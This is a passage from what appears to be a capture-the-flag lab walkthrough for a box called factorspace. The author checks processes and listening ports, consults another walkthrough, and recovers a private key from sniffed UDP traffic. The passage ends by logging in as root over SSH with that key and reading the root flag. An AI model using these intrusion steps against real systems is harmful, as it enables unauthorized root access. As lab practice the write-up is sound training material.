jackie       987  0.0  0.5   8512  5136 pts/0    Ss   03:31   0:00 -bash
root        1207  0.1  0.0      0     0 ?        I    03:40   0:02 [kworker/0:0-events]
root       12269  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/0:1-ata_sff]
root       12270  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/u2:0-flush-8:0]
root       12344  0.0  0.0      0     0 ?        I    04:01   0:00 [kworker/0:2-ata_sff]
root       12350  0.0  0.0   5368   500 ?        Ss   04:01   0:00 /bin/sleep 10
jackie     12351  0.0  0.3   9760  3244 pts/0    R+   04:01   0:00 ps auxww

Nothing there either.

Check the listening ports.

jackie@factorspace:~$ ss -tulnp
Netid       State        Recv-Q       Send-Q             Local Address:Port             Peer Address:Port       Process       
udp         UNCONN       0            0                        0.0.0.0:68                    0.0.0.0:*                        
tcp         LISTEN       0            128                      0.0.0.0:22                    0.0.0.0:*                        
tcp         LISTEN       0            511                            *:80                          *:*                        
tcp         LISTEN       0            128                         [::]:22                       [::]:*   

Ugh, sweating bullets now; there is nothing at all.

With no other option I peeked at a walkthrough, and they have an unusual UDP entry in ss -tulnp. Why don't I? Rebooted the box and it still isn't there, damn it.

Probably my box and my kali are on different network adapters.

Never mind. The rest is capturing the UDP traffic from 192.168.56.138 in Wireshark; the packet payload contains a private key, and logging in as root with that key gives root.

┌──(root㉿kali2)-[~/Desktop]
└─# cat id        
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

┌──(root㉿kali2)-[~/Desktop]
└─# ssh root@192.168.56.138 -i id
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 30 04:39:10 2024 from 192.168.56.104
root@factorspace:~# whoami
root
root@factorspace:~# cat /root/r*
052cf26a6e7e33790391c0d869e2e40c
root@factorspace:~# 
